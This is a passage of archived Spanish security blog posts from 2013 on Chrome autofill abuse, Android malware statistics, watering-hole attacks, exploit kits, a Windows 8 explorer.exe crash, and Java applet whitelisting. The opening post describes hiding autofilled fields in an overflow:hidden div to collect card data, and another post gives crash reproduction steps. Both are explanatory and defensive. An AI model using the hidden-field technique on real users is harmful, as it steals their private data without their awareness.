número y fecha de caducidad). Los datos (excepto la tarjeta de crédito) se pueden sincronizar con la cuenta de Google. El menú de configuración y cómo acceder a él, se observa en la siguiente secuencia de imágenes. Diferentes pantallas de configuración de "autofill" en Chrome Para que un formulario aproveche el autofill, los inputs deben ser debidamente identificados para que Chrome sepa qué valores corresponden. Dispone de cierta heurística para intentar que casen los campos. Por ejemplo sabe que autocomplete="mail" debe ir autocompletado con el mismo contenido que cuando lleva de valor autocomplete= "Work email". El "ataque" Un atacante puede aprovechar esta característica del navegador para obtener información privada como puede ser los datos del domicilio o datos de la tarjeta bancaria. Planteamos un escenario en el que la víctima visite una página web por https especialmente modificada, introduzca los datos y el atacante se ayude del autofill que ofrece el navegador para obtener datos sensibles almacenados. Todo esto a pesar de las pequeñas trabas que introduce Chrome en su código para evitarlo. Por ejemplo, como precaución, Chrome solo proporciona la tarjeta de crédito a páginas bajo https. Esto no es ningún problema para un atacante, pues es solo tiene que operar a través de una conexión SSL. Existen páginas fraudulentas que funcionan con certificados gratuitos. El segundo paso es preparar el formulario y ocultar a los ojos de la víctima, los inputs que interesan al atacante. La primera aproximación pensaría en utilizar la etiqueta "hidden". Pero en el input el atributo type no puede llevar ese valor. Una segunda aproximación podría ser introducir el formulario dentro de un div con la propiedad visibility en " hidden"... pero Chrome evita que los inputs sean auto-rellenados cuando se cumplen estas condiciones. ¿Cómo conseguirlo entonces? Una fórmula puede ser aprovechar la propiedad de scroll, subiendo la capa algunos píxeles para que no se observen el resto de inputs en los que se pretende recopilar la información. En este caso, el formulario "gancho" se vería: Pero, usando este "div", conseguimos que en su interior se oculten todos estos inputs y no se visualicen en el navegador: div style ="overflow:hidden;height:25px;" Chrome rellenará toda la información adicional sin que la vea el usuario. El atacante, recopilará la información y podrá disponer de muchos más datos de los que cree haber rellenado el usuario. En resumen, aunque resulte cómodo (para sistemas usados por una misma persona solamente), debe evitarse el uso de la funcionalidad autofill, puesto que se ha demostrado que es posible ofrecer a cualquier página bajo https datos tan sensibles como el número de la tarjeta de crédito y su fecha de caducidad, sin que la víctima sea consciente. Para evitar este problema (o potenciales en el futuro), por ahora el mejor remedio es simplemente no utilizar esta funcionalidad. Ricardo Martín Rodríguez ricardo.martin@11paths.com
15 de octubre de 2013
El malware para Android se exagera... según la propia Google
Normal 0 21 false false false ES X-NONE X-NONE MicrosoftInternetExplorer4 /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Tabla normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin-top:0cm; mso-para-margin-right:0cm; mso-para-margin-bottom:10.0pt; mso-para-margin-left:0cm; line-height:115%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-fareast-font-family:"Times New Roman"; mso-fareast-theme-font:minor-fareast; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin;} Adrian Ludwig, jefe de seguridad de Android, dio una charla en la Virus Bulletin de Berlin destinada a quitar hierro al asunto del malware en Android. Con datos sobre la mesa, desmontó el supuesto "mito" de que Android se infecta mucho con malware. Alabó la defensa en profundidad que implementa su sistema operativo. No engañó a nadie, pero tampoco contempló toda la verdad. Ludwig dice que los investigadores son buenos a la hora de encontrar el malware, pero que no tienen datos fiables que indiquen la frecuencia con la que una aplicación ha sido instalada... y así se acaba exagerando. En resumen y en nuestras propias palabras, que los reportes sobre malware en Andorid no reflejan la realidad. Puede haber mucho ahí fuera, pero no llega a instalarse. Sus datos dicen que el malware más "popular" últimamente solo se instala en los teléfonos una de cada millón de veces. El resto es bloqueado por esa multicapa de seguridad de la que se enorgullecen. Y es que una vez han contado con datos concretos sobre la mesa para poder mostrarlos, han descubierto que no es para tanto. Entre sus afirmaciones, destaca que solo el 0.001% de las instalaciones de apps en Android son capaces de evadir las defensas multicapa de Android. Con defensas multicapa se refiere a: a) El propio filtro que realiza Google Play. b) La advertencia cuando las apps vienen de fuentes desconocidas. c) La propia confirmación al instalar. d) La tecnología de Verify Apps, que comprueba las apps en tiempo real contra malware. e) Las comprobaciones de seguridad en tiempo de ejecución. f) La sandbox y los permisos. Verify Apps compara cada descarga e instalación de apps, provenga de donde provenga, con una base de datos de malware. Según sus cálculos, los usuarios solo instalan un 0.12% de las apps sobre las que Verify Apps alerta como malware o PHA ("potentially harmful apps"). Con esto pretende demostrar la eficacia de Verify Apps. Fuente: http://qz.com/131436/contrary-to-what-youve-heard-android-is-almost-impenetrable-to-malware/ También se centra en otras cifras muy beneficiosas para su imagen. El 100% de los dispositivos cuenta con protección de sandbox y permisos. El 95% cuenta con Verify Apps. Solo un 0,001% de las apps intenta eludir las defensas y controles en tiempo de ejecución e incluso un número menor intenta realmente dañar el teléfono. Como se observa, el mensaje trata de asociar porcentajes muy bajos con el malware. Una inteligente maniobra de comunicación con la que deja fuera el mensaje importante: qué significa, cómo se percibe y en qué consiste el problema del malware en Android realmente. El éxito no se mide por las "bajas" enemigas El mensaje de Ludwig quiere recalcar que las defensas de Android son eficaces. Y probablemente sea cierto. Lo importante es, ¿limita eso las infecciones como para que dejen de considerarse un problema? ¿Le importa siquiera a la industria del malware en Android? ¿Hace que desciendan los niveles de infección o que se dediquen menos esfuerzos a crear malware nuevo para esta plataforma? Se pueden disponer de buenas defensas en seguridad y ser esclavo del malware. Que se lo pregunten a Windows. También pide confirmación, cuenta con un antivirus de serie (dos, en realidad), desde Vista trabaja con el mínimo privilegio por defecto y una especie de sandbox integrada para ciertos procesos, implementa interesantes contramedidas contra las vulnerabilidades... e incluso así le cuesta muchísimo bajar el ratio de infección. Aun más eliminar esa percepción popular sobre su facilidad para infectarse... su "mala fama". Sus defensas serán muy eficientes, pero parecen poco eficaces para la inmensa mayoría. Ludwig no distingue entre la eficiencia en números de sus herramientas y los niveles de infección. Decir que solo un 0.12% de las aplicaciones que ellos detectan como malware llegan a ser instaladas, no ofrece ningún dato sobre el porcentaje real de infecciones en los sistemas Android. Y pueden llegar a ser cifras muy dispares. Si realizamos una comparación con el correo basura, estamos seguros de que la cifra del spam real que llega a las bandejas de entrada es minúsculo. De ellos, tras muchas capas de seguridad, un porcentaje aún menor consigue infectar o estafar a un usuario. Las medidas son eficientes. ¿"Exageramos" al afirmar que, aun así, el spam es un problema grave para el correo? ¿"Exageramos" al afirmar que sigue siendo una vía muy usada e incluso eficaz para la infección de sistemas y estafas de usuarios? También parten, como siempre, de la supuesta fiabilidad de la detección de apps como maliciosas. No todo lo indetectado es benigno. ¿Cuántas no detectadas como malware eluden las capas de seguridad? No se sabe. La infección real solo pueden ser identificada en un estadio posterior, una vez se detecta en el terminal actividad sospechosa por red, por ejemplo. Esa sería una métrica más precisa para conocer el nivel de infectados. De hecho así lo calculan en Kindsight Security Labs y afirman que más de un 1% de los Android están infectados. Y eso solo donde operan. En países como China o Rusia el ratio es muy superior al resto del mundo. Si preguntamos a las casas antivirus, las cifras sin duda se elevarán. Obvia que al malware/adware que envía SMS a números premium, o que muestra publicidad constantemente (los más populares), no les importa estar encerrados en una sandbox, y mucho menos tiene como objetivo dañar el teléfono (debe mantener vivo a su anfitrión para monetizar la infección). Estas medidas les resultan simplemente irrelevantes. Olvida otros aspectos, como la cantidad de malware que se cuela en Google Play y elude sus propias defensas. Nos consta, por las investigaciones que estamos llevando a cabo, que no es poco. Su política de permitir certificados autofirmados les está pasando factura. Conclusiones Las cifras son complejas de evaluar, y siempre pueden mostrarse desde diversos puntos de vista. Es legítimo que Google se enorgullezca de sus medidas contra el malware, pero no hay que confundir al usuario. No se exagera. La concienciación es necesaria, sin llegar al "FUD" (Fear, uncertainty and doubt). Algunas cifras muy vistosas, desde el lado contrario, hablan de que el malware para Android se ha incrementado más de un 600% en el último año, mientras que para otras plataformas sigue siendo anecdótico o literalmente inexistente. Esto tampoco pretende contradecir a Ludwig. Sus defensas siguen protegiendo y son mejores que nada. Pero este incremento sostenido de la producción de malware para Android desdibuja cualquier alivio producido por la eficacia de unas herramientas preventivas e imperfectas. Fuente: http://www.kindsight.net/sites/default/files/Kindsight-Q2-2013-Malware-Report.pdf Porque indican que los atacantes no renuncian a una producción masiva... y si no lo hacen es porque les es rentable. Nadie trabaja en balde, y menos la industria del malware para Android, heredera directa de la del malware para sobremesa. Por tanto, esa producción incesante responde solo a un hecho: les merece la pena la inversión. Y lamentablemente de ahí se deduce un panorama diferente al que pinta Ludwig. Los atacantes consiguen beneficios con esta producción creciente, mantienen un ratio de infección que compensa sus esfuerzos, obvian o eluden las medidas de seguridad impuestas... en definitiva, dan la sensación de que, a pesar de los porcentajes tan bajos que muestra Google en las gráficas, del "éxito" de sus contramedidas, existe un claro ganador que se está beneficiando de la situación. Sergio de los Santos ssantos@11paths.com @ssantosv
11 de octubre de 2013
Watering hole: nuevos términos para ¿nuevos? ataques
Normal 0 21 false false false ES X-NONE X-NONE MicrosoftInternetExplorer4 /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Tabla normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin-top:0cm; mso-para-margin-right:0cm; mso-para-margin-bottom:10.0pt; mso-para-margin-left:0cm; line-height:115%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-fareast-font-family:"Times New Roman"; mso-fareast-theme-font:minor-fareast; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin;} F-Secure y Bit9 coinciden. "Watering hole" es el término que se debe usar de ahora en adelante para estar a la última sobre los diferentes tipos de ataques sofisticados a empresas y organizaciones. ¿Qué significa y por qué está de moda? Aunque los más importante es saber si realmente supone alguna diferencia con los términos que ya solemos usar. F-Secure ha destacado en su informe de la primera mitad de 2013 que uno de los incidentes más interesantes del año ocurrió en febrero. Atacaron en un corto periodo de tiempo a, entre otros, Twitter, Facebook, Apple y Microsoft. Todos emitieron comunicados admitiendo que habían sufrido alguna intrusión en su red. Al parecer, los atacantes comprometieron una popular página de programación de aplicaciones para iPhone. Los desarrolladores de esas compañías, asiduos a esa web por motivos profesionales, quedaron infectados a través de una vulnerabilidad previamente desconocida en Java. En mayo apareció un 0day en Internet Explorer. Fue descubierto a raíz de un ataque a una web pública del departamento de trabajo norteamericano. Se comprometió una base de datos sobre niveles de toxicidad de ciertas instalaciones nucleares del departamento de energía. Los empleados del departamento de trabajo (las verdaderas víctimas) la usaban habitualmente para sus labores. Alguien pudo acceder al servidor y subió código que aprovechaba esa vulnerabilidad. Nick Levay, CSO de Bit9, también destaca este tipo de ataque haciendo hincapié sobre su creciente popularidad. "No hay mucho que un individuo pueda hacer contra los ataques de tipo watering hole, no lo van a ver venir". Destaca que cada vez estos ataques son más especializados. Qué es y qué aporta el término Fuente: Tiespecialistas.com.br La RSA los bautizó así. Watering hole es el término usado en la naturaleza para nombrar una poza donde los animales acuden a beber, por ejemplo en la sabana africana. El nombre del ataque pretende representar a los leones que, en vez de salir a buscar a sus presas, las esperan agazapadas cerca de la charca. Saben que tarde o temprano acudirán a repostar en ella y ahí, cuando las víctimas se relajan, se preparan para perpetrar el ataque. En seguridad informática, l a poza es una web especializada a la que suele acudir la víctima. Por ejemplo un foro de programación. La comprometen de forma que puedan subir código propio, y así intentan explotar alguna vulnerabilidad en el navegador del usuario. Esto contrasta con los ataques "dirigidos" comunes hoy en los que se el atacante envía específicamente por email u otros medios documentos o enlaces muy concretos y personalizados a diferentes organizaciones, con la esperanza de que los abran y aprovechen alguna vulnerabilidad. Por tanto, las diferencias con otros tipos de ataque, se podrían resumir en: Existe un "efecto colateral", un ataque a un tercero que deben comprometer y esperar a que la víctima acuda. Se cuida incluso que afecte a cierto rangos de IPs para pasar aún más desapercibido. Se aprovecha la potencial relajación en seguridad en la víctima que visita una web con frecuencia. Por ejemplo, si tiene la buena costumbre de usar listas blancas para restringir el uso de JavaScript o Java en el navegador, muy posiblemente esa web a la que es asiduo, tendrá vía libre y facilitará la explotación al atacante. Otro ejemplo es que el propio perfil de víctima (por ejemplo un programador) se someta o necesite una seguridad global más relajada por su perfil más técnico. Otros aspectos como exploits previamente desconocidos o el trabajo es más personalizado y elaborado (porque requiere un estudio previo de las costumbres de la víctima) ya están presentes en otros muchos tipos de ataque y no suponen diferencia. ¿Es grave? Resumido de esta manera, parece que no existen muchas diferencias con lo que se ha venido denominando APTs. Quizás el "efecto colateral" de compromiso de una web específica y lo acertado de la metáfora de los leones, es lo que ha dado popularidad al término. Aunque los ataques colaterales no son nada nuevo, y los ha habido mucho más espectaculares que el compromiso de una web. Recordamos dos especialmente interesantes: El supermalware TheFlame atacó de una forma muy ingeniosa a la mismísima estructura PKI de Microsoft con el único objetivo de firmar su código y pasar desapercibido en los sistemas que realmente quería atacar. En febrero, Bit9 tuvo que reconocer públicamente que entraron en su red y pudieron firmar código con uno de sus certificados. Los atacantes fueron capaces de entrar así en la red de un tercero (la víctima real) que solo permitía la ejecución de código previamente validado y firmado por Bit9. En estos ataques con "daño colateral" la actitud del atacante es quizás menos "pasiva" que en los llamados watering hole, pero no por ello menos elaborada o exenta de grandes dosis de paciencia y planificación. Estos ejemplos son mucho más complejos que los que se basan en ataques a páginas de terceros, sin embargo aún no parecen dignos de nombre propio. En resumen, los ataques del tipo "watering hole" pueden ser útiles en escenarios donde la seguridad de una compañía sea más elevada que la media y, por ejemplo, sus usuarios deban navegar por sitios muy restringidos o no se les permita abrir documentos en correos. El atacante se ve obligado a basarse en las vulnerabilidades de un tercero para tener éxito. Sin embargo, los actores y circunstancias son muy similares a otros escenarios. Si hay algo que mejorar para evitar este tipo de ataques, es la seguridad impuesta en el navegador cuando se visitan páginas conocidas. Siempre se han recomendado las listas blancas de navegación, para restringir el uso de Flash, JavaScript o Java, a páginas concretas por habituales o necesidad. Este tipo de ataques aprovechan esa relajación, y es lo que realmente importa cuestionarse. ¿Caben otras medidas de seguridad en el navegador incluso cuando se navegan por páginas de confianza? ¿Se deben revisar incluso las listas blancas? Sí. No es nada nuevo que la famosa seguridad en profundidad debe abarcarlo todo y es el mejor antídoto del que se dispone hoy por hoy contra los ataques, tomen el nombre que tomen en el futuro. Sergio de los Santos ssantos@11paths.com @ssantosv
8 de octubre de 2013
Los atacantes aceleran la incorporación de vulnerabilidades recientes en sus kits
F-Secure ha publicado su reporte sobre amenazas que cubre la primera mitad de 2013. En el estudio (además de una espectacular tercera página de su Chief Research Office, Mikko, en alta resolución) se refleja la experiencia de la casa antivirus durante estos seis meses detectando amenazas y tendencias. Uno de los datos más interesantes son los relativos a las vulnerabilidades utilizadas, y cuándo están siendo incorporadas a los kits de los atacantes. Los kits de explotación siguen siendo, desde hace varios años, el método más efectivo para infectar los sistemas. Otras formas de infectar como el envío de correos con ejecutables o documentos que aprovechan vulnerabilidades son muy usados, pero menos eficaces. La mayor parte de las veces, basta con mantener el sistema actualizado para permanecer relativamente a salvo. Aunque, ante ataques desconocidos o no parcheados oficialmente, es necesario utilizar herramientas adicionales que protejan contra las técnicas de exploiting más habituales. Los kits de explotación web son un negocio floreciente. Se han creado unos 8 ó 10 este año. Sin embargo Blackhole, Cool, CrimeBoss,Styx y SweetOrange copan tres cuartas partes del "mercado". Como producto, necesitan incorporar reclamos para sus posibles clientes. Factores como la usabilidad y precio influyen, pero si un usuario de un kit necesita rentabilizar su inversión quiere resultados. Y para ello necesita vulnerabilidades "de calidad" que funcionen en la mayoría de las potenciales víctimas. Cuanto más recientes las vulnerabilidades y en un software más popular, más víctimas potenciales. Así durante 2013 se ha observado una tendencia clara: estos exploits cada vez se incorporan antes a los kits. Por ejemplo, el 20 de abril se publicó en Metasploit el código para explotar CVE-2013-2423. Un día más tarde ya estaba siendo aprovechado por el kit CrimeBoss. CVE-2013-1347 es un fallo grave en Internet Explorer con la que se comprometió una organización gubernamental americana en mayo. En junio, poco después de que Microsoft publicara el parche, se estaba ya usando en el kit Private. Así, durante este primer semestre ya se han incorporado a la mayoría de kits vulnerabilidades de este mismo año: CVE-2013-0422 (Java en enero), CVE-2013-0431 (Java en febrero), CVE-2013-1493 (Java en marzo) y CVE-2013-2423 (Java también en marzo). Top 5 Y cuando los atacantes disponen de vulnerabilidades recientes, fiables y populares, la explotación se centra en lo eficaz y se segmenta muy poco. Así, durante el primer semestre de 2013, cinco vulnerabilidades fueron responsables del 95% de los incidentes relacionados con fallos de seguridad (sufridos por los clientes de F-Secure) . Y de ellas, 4 corresponden a Java y una a Windows: F-Secure 1H2013 report CVE-2011-3402: Aprovechada por Duqu a finales de 2011, un fallo a procesar fuentes TrueType en Windows. Efectiva y que da privilegios al atacante. Las mencionadas: CVE-2013-1493, CVE-2011-2423, CVE-2013-0422 y CVE-2011-3544, un problema en Java en octubre 2011. Aunque para el estudio se centre en los clientes de F-Secure, y por tanto en la propia capacidad del producto de detectar y clasificar correctamente los ataques, lo cierto es que todos los analistas han llegado a una conclusión muy parecida. La tormenta perfecta En general, a partir de 2006 en adelante, (quizás hasta 2010) las vulnerabilidades en los kits más populares atentaban contra Internet Explorer 6 y Adobe Reader. En los últimos años los kits se centran en Java y ocasionalmente en Internet Explorer cuando se encuentra algún fallo grave. Otro fenómeno observado durante 2012 y 2013 es que los kits querían ser los primeros en incorporar vulnerabilidades de Java. Porque Java cumple todos los requisitos: es popular, los usuarios no suelen actualizarlo, y las vulnerabilidades son muy sencillas de aprovechar. En los últimos tiempos, se han descubierto numerosos fallos que no dependen de desbordamientos de búfer o complicados problemas en la máquina virtual, sino que se trataban de simples problemas en la lógica de funcionamiento. Esto ha convertido a Java en lo que es, el software preferido por los atacantes. Sergio de los Santos ssantos@11paths.com @ssantosv
1 de octubre de 2013
Cómo provocar un DoS en el explorer.exe de Windows 8
Por accidente, hemos descubierto cómo provocar un DoS de explorer.exe en Windows 8. Se trata de un pequeño bug introducido en la última versión del sistema operativo. Lo documentamos como simple anécdota, puesto que desde Microsoft no lo han considerado un problema de seguridad y parece complejo que pueda ser aprovechado para explotarlo de alguna forma. Explorer.exe es un servicio muy importante en Windows. Se encarga de pintar el escritorio y darle el token de seguridad a los programas que heredan de él, para que se mantengan en el mismo entorno. Es vital que se ejecute en el sistema en todo momento. Tanto, que si "muere" de alguna forma, el sistema operativo lo recupera automáticamente Parece que en Windows 8, explorer.exe no maneja correctamente una excepción a la hora de manejar firmas digitales, y esto hace que se reinicie. También afecta a otros programas que utilizan la misma API interna de procesamiento de estructuras ASN.1. Por ejemplo, cualquier programa en C# que intente procesar signedInfo de una firma. Para reproducir el problema, se debe: Tomar un binario (DLL o EXE) firmado. Cualquiera es válido. Rellenar parte de la estructura PKCS al final del fichero con datos aleatorios. Por ejemplo "00". Con unos 256 bytes funciona. Zona de la firma modificada con cualquier editor hexadecimal En este ejemplo, se ha "machacado" parte de la información relativa a la contrafirma, como se observa al estudiar la estructura ASN.1 con otro programa diferente. No hemos comprobado qué parte exactamente es necesario sobrescribir o qué mínimo es necesario para provocar el fallo. A la izquierda la estructura ASN.1 alterada, a la derecha, la estructura sin alterar Si se machaca otro tipo de información, Windows pensará simplemente que el fichero no está firmado y no mostrará la opción de "Firmas Digitales" en las propiedades. Desde Explorer, ver las propiedades y "Firmas Digitales" hará que explorer.exe no maneje la excepción y falle. Otros programas como Total Commander también se interrumpen. En realidad cualquier programa que no recoja la excepción de datos ASN.1 dañados, dejará de funcionar. Y aquí es donde explorer.exe hace un mal trabajo, y eso es de extrañar. Sobre todo, porque solo ocurre en Windows 8. La misma prueba de concepto en Windows XP o 7 hace que el sistema operativo muestre la pestaña de "Firmas Digitales" pero nada dentro. Una situación que no es normal, (si no hay firma, no debería mostrar la pestaña) pero al menos no hace que se reinicie el proceso. Otros programas de comprobación de firma como sigcheck or signtool no se ven afectados. Como hipótesis, es posible que tenga que ver con el cambio de "diseño". En windows 7 y XP, en la pestaña de firmas digitales se muestra el email del que firma. En Windows 8, el hash. Suponemos que se dieron cuenta de que pocos incluían el email en la firma, y por tanto ese campo solía estar vacío. A la izquierda las propiedades de un fichero firmado en Windows 7. A la derecha, en Windows 8. Un pequeño análisis previo indica que parece complicado que se pueda aprovechar para ejecutar código. Desde MSRT nos indican que efectivamente, parece más un bug que un fallo de seguridad. Sergio de los Santos ssantos@11paths.com @ssantosv
26 de septiembre de 2013
Cómo funcionan las nuevas listas negras en Java y cómo aprovecharlas (usando listas blancas)
Oracle ha introducido la noción de lista blanca en su última versión de Java 7 update 40. Es un gran paso adelante (tomado demasiado tarde) en seguridad para esta plataforma pero... ¿cómo funciona? ¿cómo se maneja con versiones más antiguas? Y lo más importante ¿cómo se consigue bloquear todo excepto algunos applets que se quieran? Esta es la primera vez en años que Java permite hacer lista blanca de applets. Se ha convertido en una necesidad real para la seguridad, a causa de los numerosos kits existentes que aprovechan cualquier problema relacionado con Java y su "inseguridad natural". Antes de esta versión, Java disponía ya de una lista negra de algunos applets. Pero el sistema está totalmente manejado por Oracle, actualizado solo en cada versión, no es dinámico y se encuentra muy mal documentado. Pero ahora, al menos con Java 7u40, se tiene la oportunidad de realizar listas blancas con bastante granularidad. Pero no es trivial. Se necesita un fichero ruleset.xml, compilarlo y firmarlo. Para firmarlo se puede usar un certificado "real" o un autofirmado creado ad-hoc e introducido en el repositorio de confianza. Paso a paso. Creando el ruleset.xml Se trata de un fichero XML estándar con una sintaxis relativamente simple. Es posible bloquear o permitir applets dependiendo del dominio del que provengan o dependiendo de quién los ha firmado. También se puede especificar bajo qué versión de Java se quiere que se ejecute. Acepta comodines y reglas por defecto, lo que lo hacen muy granular. En el ejemplo, se crea un fichero que permite que funcionen solo los applets alojados en java.com y bloquear el resto. <ruleset version="1.0+"> <rule> <id location="http://*.java.com" /> <action permission="run" version="SECURE-1.7" /> </rule> <rule> <id /> <action permission="block"> <message>Bloqueado por las reglas del sistema</message> </action> </rule> </ruleset> El último "id" indica que es la regla predeterminada y casa con cualquiera que no haya casado antes. La etiqueta "version" puede ser cómoda... o peligrosa. Permite especificar que un applet funcionará solo con la versión (antigua) deseada y eso, por definición, traerá problemas de seguridad. Así que si el sistema mantiene versiones antiguas (6.x) y un applet las usa, es necesario tener en cuenta que estas reglas no aplican en la rama 6.x de JRE y no se bloqueará nada. En resumen, mantener esa rama en el equipo podría anular toda la seguridad. Los ruleset permite ejecutar, por ejemplo, solamente applets firmados por un certificado concreto... y mucho más. Las especificaciones están aquí. Paso a paso. Crear el jar y firmarlo Se debe descargar el JDK y ejecutar: C:Archivos de programaJavajdk1.7.0_40bin>jar -cvf DeploymentRuleSet.jar rulset.xml Una vez creado, firmarlo: C:Archivos de programaJavajdk1.7.0_40bin>jarsigner -verbose -keystore keystore.jks -signedjar DeploymentRuleSet.jar DeploymentRuleSet.jar selfsigned Donde "keystore.jks" podría ser el repositorio de claves normal y "selfsigned" el alias del certificado. Si ya se tiene un certificado válido (firmado por una CA), se puede eludir el siguiente paso. Si no, se puede crear un certificado autofirmado con el siguiente comando: keytool -genkey -keyalg RSA -alias selfsigned -keystore keystore.jks -storepass 123456 -validity 360 -keysize 2048 Donde "123456" es la contraseña necesaria para desbloquear el repositorio (no confundir con la contraseña del propio certificado). Hará algunas preguntas. No importan las respuestas. Finalmente, se exporta el certificado: keytool -export -alias selfsigned self.crt -keystore keystore.jks Y debe importarse como raíz de confianza. Se podría hacer en Windows (instalándolo en certmgr.msc) o dentro del repositorio proipo de Java, de esta forma: C:Archivos de programaJavajdk1.7.0_40bin>keytool -importcert -alias selfsign ed -file self.crt -trustcacerts -keystore ....jre7libsecuritycacerts Ahora que DeplymentRuleSet.jar está firmado por una raíz de confianza, se puede copiar a su sitio (es curioso que Oracle todavía conserva muchos nombres "Sun" cuatro años después). C:Archivos de programaJavajdk1.7.0_40bin>copy DeploymentRuleSet.jar c:WINDOWSSunJavaDeploymentDeploymentRuleSet.jar Si se ejecuta javacpl.cpl se puede comprobar que Java está al tanto de las reglas: Comprobándolo todo Así, si se comprueban applets en el dominio especificado (lista blanca), se ejecutarán pero cualquier otro será bloqueado. Esto es bastante interesante y una funcionalidad muy esperada (si no se tienen que mantener versiones antiguas). Las traducciones dejan bastante que desear Conviene no olvidar: Todo esto no tiene sentido si no se desarrollan otras medidas de seguridad en Java. Por ejemplo elevar la palanca de seguridad a "alta" en las opciones de seguridad. Por ahora, con esta palanca se podría "proteger" al usuario del malware "autofirmado", pero ¿qué pasa con el código bien firmado? Esta funcionalidad trata de llenar ese hueco. Muy importante: un applet considerado en la lista blanca a través de cualquier regla, hace que el resto de pantallas de advertencia introducidas en Java 7u10 desaparezcan antes de su ejecución. Todo esto no es útil si Java no se actualiza regularmente y se eliminan las versiones antiguas del sistema si no se necesitan. Como curiosidad, si se usa un certificado en el que no se confía para firmar DeploymentRuleSet.jar, se bloquearán también los applets, pero con otro mensaje. Es importante notar que Oracle ha advertido que si encuentra certificados que firmen ficheros DeploymentRuleSet .jar que permitan ejecutar todo sin restricciones, los meterá en la lista negra definitiva. En cualquier caso, Oracle tiene que mantener la compatibilidad hacia atrás con la rama 1.6 incluso cuando se le deje de dar soporte. Esta ha sido la mejor manera que han encontrado para ayudar a los administradores con una herramienta nativa que controle la locura del plugin de Java. No está mal. Sergio de los Santos ssantos@11paths.com @ssantosv
20 de septiembre de 2013
Mostrar cadena certificados sin usar el "certificate store" de Windows (en c#)
Java mantiene su propia "store" de certificados, independiente a la de Windows. Esto implica que si se visualiza de forma "nativa" en Windows un certificado extraído de un fichero APK o JAR, puede que no encuentre el certificado raíz en el "store" del sistema y por tanto no podrá validarlo. Habría que usar el propio store de Java para poder "verlo". ¿Pero y si este mismo certificado se "ve" en otro entorno? En la imagen de abajo se muestra un ejemplo de lo que ocurre si Windows no integra en su store (como sí lo hace Java) el certificado del emisor intermedio (en la imagen "Thawte Code Signing CA") y el que a su vez firme este. Esta pantalla se consigue o bien "ejecutando" un fichero en formato DER o bien con X509Certificate2UI.DisplayCertificate() que hereda de System.Security.Cryptography.X509Certificates. Para mostrarlo de esta forma, validando toda la cadena, se pueden pensar diferentes posibilidades: Instalar todos los certificados root de Java en la store de Windows: No es la opción óptima, además de pedir la confirmación uno a uno. Instalar temporalmente el certificado root del apk o jar en cuestión y borrarlo tras la comprobación. Sigue pidiendo confirmación y no resulta buena idea tocar la raíz de confianza del usuario. Extraer toda la cadena de certificados del apk o jar y hacer la comprobación manualmente. Obviamente la mejor. La primera aproximación suele ser intentar construir un X509Chain que proporciona Microsoft para comprobar una cadena de certificados hacia arriba. El comportamiento de X509Chain es altamente cofigurable y permite cambiar las distintas políticas de comprobación así como añadir distintos certificados a la cadena manualmente. Una vez definidos ChainPolicy y ChainElements se llama al método Build() de X509Chain que devuelve un booleano con la validez o no de la cadena... y eso es todo. Es decir, nos devuelve un booleano pero nada de gráficos para mostrar por pantalla. Aunque Windows no mostrara los certificados porque no confiase en ellos, estos sí que están presentes en la estructura PKCS#7 que se ha extraído del apk o jar, por tanto es necesario bajar un poco el nivel. Lo ideal sería un "store" propio de certificados en memoria para no alterar los del equipo (CurrentUser y LocalMachine). Este store se le puede pasar a la función "CryptUIDlgViewCertificate" que está presente en "Cryptui.dll" y que no es más que el cuadro de diálogo que muestra Windows asociado a los .cer, .crt, etc. De esta manera podría comprobar la cadena y mostrar los certificados aunque Windows no confiara en ellos de forma nativa. La manera de crear un "store virtual" de certificados es mediante " CertOpenStore". Para usarlo en C# hay que importar la DLL: [DllImport("CRYPT32", EntryPoint
= "CertOpenStore", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern IntPtr CertOpenStore(
int storeProvider, int encodingType,
int hcryptProv, int flags, string pvPara);
Y al llamarlo se debe indicar que nuestro storeProvider será de tipo CERT_STORE_PROV_PKCS 7 siendo "pvPara" un puntero a los datos. Los archivos apk y jar guardan la estructura PKCS en un formato RSA o DSA y por tanto es necesario descifrar el PKCS7 contenido en el archivo antes de acceder a los certificados que contiene. Para conseguirlo se puede utilizar "WinCrypt", especifícamente CryptQueryObject de la siguiente manera: if (!WinCrypt.CryptQueryObject(
WinCrypt.CERT_QUERY_OBJECT_FILE,
Marshal.StringToHGlobalUni(@"X:RutaFichero.RSA"),
WinCrypt.CERT_QUERY_CONTENT_FLAG_ALL,
WinCrypt.CERT_QUERY_FORMAT_FLAG_ALL,
0,
out encodingType,
out contentType,
out formatType,
ref certStore, //Contiene el "Store" con los certificados.
ref cryptMsg, //Contiene la estructura PKCS7
ref context))
Una vez tenemos "certStore" de tipo "IntPtr" lo podemos pasar a "CryptUIDlgViewCertificate" como "Extra Store" contra el que comprobará el certificado principal y realizará la validación hacia arriba hasta el certificado principal... y lo mostrará en pantalla. Aquí el código: //en myCert tendremos el certificado principal
X509Certificate2 myCert = new X509Certificate2(@"X:RutaFichero.RSA");
//los extra stores que queramos usar deben pasarse como puntero al array que los contiene
var extraStoreArray = new[] { certStore };
var extraStoreArrayHandle = GCHandle.Alloc(extraStoreArray, GCHandleType.Pinned);
var extraStorePointer = extraStoreArrayHandle.AddrOfPinnedObject();
//rellenamos la estructura con los parámetros
CRYPTUI_VIEWCERTIFICATE_STRUCT certViewInfo = new CRYPTUI_VIEWCERTIFICATE_STRUCT();
certViewInfo.dwSize = Marshal.SizeOf(certViewInfo);
certViewInfo.pCertContext = myCert.Handle;
certViewInfo.szTitle = "Certificate Info";
certViewInfo.dwFlags = CRYPTUI_DISABLE_ADDTOSTORE;
certViewInfo.nStartPage = 0;
certViewInfo.cStores = 1;
certViewInfo.rghStores = extraStorePointer;
